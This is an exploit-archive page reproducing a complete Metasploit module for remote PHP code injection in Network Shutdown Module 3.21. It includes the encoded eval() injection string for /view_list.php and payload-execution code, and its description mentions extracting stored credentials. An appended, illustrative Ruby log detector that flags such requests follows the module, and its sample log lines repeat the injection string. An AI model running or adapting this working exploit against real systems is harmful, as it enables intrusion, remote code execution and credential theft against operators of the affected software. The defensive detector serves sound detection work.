
Network Shutdown Module 3.21 Remote PHP Code Injection

Date: 29 Nov 2012 | Reported by: metasploit | Type: zdt | Source: 0day.today

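Network Shutdown Module 3.21 remote PHP code injection. A vulnerability in lib/dbtools.inc places unsanitized user input inside an eval() call. The module description also states that the Base64-encoded user credentials are extracted from the application's database; stealing credentials requires at least one USV module (an entry in the "nodes" table in mgedb.db).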

Code
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Network Shutdown Module <= 3.21 (sort_values) Remote PHP Code Injection',
      'Description'    => %q{
        This module exploits a vulnerability in lib/dbtools.inc which uses
        unsanitized user input inside an eval() call. Additionally the base64 encoded
        user credentials are extracted from the database of the application. Please
        note that in order to be able to steal credentials, the vulnerable service
        must have at least one USV module (an entry in the "nodes" table in mgedb.db)
      },
      'Author'         =>
        [
          'h0ng10',  # original discovery, msf module
          'sinn3r'   # PhpEXE shizzle
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['OSVDB', '83199'],
          ['URL', 'http://secunia.com/advisories/49103/']
        ],
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 4000
        },
      'Platform'       => ['php', 'linux'],
      'Arch'           => ARCH_PHP,

      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' }  ],
          [ 'Linux x86'            , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]
        ],
      'DefaultTarget'  => 0,
      'Privileged'     => true,
      'DisclosureDate' => 'Jun 26 2012'
    ))

    register_options(
      [
        Opt::RPORT(4679)
      ], self.class)
  end

  def check
    # we use a call to phpinfo() for verification
    res = execute_php_code("phpinfo();die();")

    if not res or res.code != 200
      print_error("Failed: Error requesting page")
      return CheckCode::Unknown
    end

    return CheckCode::Vulnerable if (res.body =~ /This program makes use of the Zend/)
    return CheckCode::Safe
  end

  def execute_php_code(code, opts = {})
    param_name = rand_text_alpha(6)
    padding    = rand_text_alpha(6)
    url_param  = "#{padding}%22%5d,%20eval(base64_decode(%24_POST%5b%27#{param_name}%27%5d))%29;%2f%2f"

    res = send_request_cgi(
      {
        'uri'   =>  '/view_list.php',
        'method' => 'POST',
        'vars_get' =>
          {
            'paneStatusListSortBy' => url_param,
          },
        'vars_post' =>
          {
            param_name => Rex::Text.encode_base64(code),
          },
        'headers' =>
          {
            'Connection' => 'Close',
          }
      })
  end

  def no_php_tags(p)
    p = p.gsub(/^<\?php /, '')
    p.gsub(/ \?\>$/, '')
  end

  def exploit
    print_status("#{rhost}:#{rport} - Sending payload")

    unlink = (target['Platform'] == 'linux') ? true : false
    p      = no_php_tags(get_write_exec_payload(:unlink_self => unlink))

    execute_php_code(p)
    handler
  end
end

#  0day.today [2018-01-10]  #
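
A defensive companion to the module above, added here as an example and not part of the original module or of Metasploit: a Ruby log check that flags requests to /view_list.php whose paneStatusListSortBy value, once percent-decoded, is not a plain identifier. The allowlist pattern, the combined-style log format and the sample lines are assumptions constructed for illustration.

```ruby
require 'uri'

# Path and parameter come from the module above. The allowlist is an assumption:
# a legitimate sort key is taken to be a plain column-style identifier.
TARGET_PATH   = '/view_list.php'
TARGET_PARAM  = 'paneStatusListSortBy'
SAFE_SORT_KEY = /\A[A-Za-z0-9_]{0,64}\z/
REQUEST_LINE  = %r{"(?<method>[A-Z]+) (?<target>\S+) HTTP/[\d.]+"}

# Percent-decode until stable so double-encoded input (%2522) is normalised too.
# Returns nil when the percent-encoding is malformed.
def decode_fully(raw, rounds = 3)
  cur = raw
  rounds.times do
    nxt = URI.decode_www_form_component(cur)
    return nil unless nxt.valid_encoding?
    return cur if nxt == cur
    cur = nxt
  end
  cur
rescue ArgumentError
  nil
end

# One finding per request to TARGET_PATH whose sort key is not a plain identifier.
def suspicious_sort_requests(lines)
  lines.each_with_index.filter_map do |line, idx|
    m = REQUEST_LINE.match(line) or next
    path, query = m[:target].split('?', 2)
    next unless path == TARGET_PATH && query
    pair = query.split('&').find { |kv| decode_fully(kv.split('=', 2)[0].to_s) == TARGET_PARAM } or next
    value = decode_fully(pair.split('=', 2)[1].to_s)
    next if value && SAFE_SORT_KEY.match?(value)
    { line: idx + 1, method: m[:method], value: value,
      reason: value.nil? ? 'malformed encoding' : 'unexpected characters in sort key' }
  end
end

# Constructed sample lines (combined-style access log, documentation address ranges).
SAMPLE_LOG = <<~'LOG'.lines(chomp: true)
  192.0.2.10 - - [10/Jan/2018:09:00:01 +0000] "GET /view_list.php?paneStatusListSortBy=name HTTP/1.1" 200 5120
  198.51.100.7 - - [10/Jan/2018:09:00:05 +0000] "POST /view_list.php?paneStatusListSortBy=AbCdEf%22%5d,%20eval(base64_decode(%24_POST%5b%27QwErTy%27%5d))%29;%2f%2f HTTP/1.1" 200 812
  198.51.100.7 - - [10/Jan/2018:09:00:09 +0000] "GET /view_list.php?paneStatusListSortBy=x%2522%255d HTTP/1.1" 200 640
  203.0.113.4 - - [10/Jan/2018:09:00:12 +0000] "GET /view_list.php?paneStatusListSortBy=%zz HTTP/1.1" 400 0
  192.0.2.10 - - [10/Jan/2018:09:00:20 +0000] "GET /index.php?paneStatusListSortBy=a%22 HTTP/1.1" 200 300
  192.0.2.10 - - [10/Jan/2018:09:00:31 +0000] "GET /view_list.php?page=2&paneStatusListSortBy=status_1 HTTP/1.1" 200 5120
LOG

suspicious_sort_requests(SAMPLE_LOG).each { |finding| puts finding.inspect }
```

The injected PHP itself travels in the POST body, which access logs do not record, so the query-string sort key is the part of the request this check can see.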
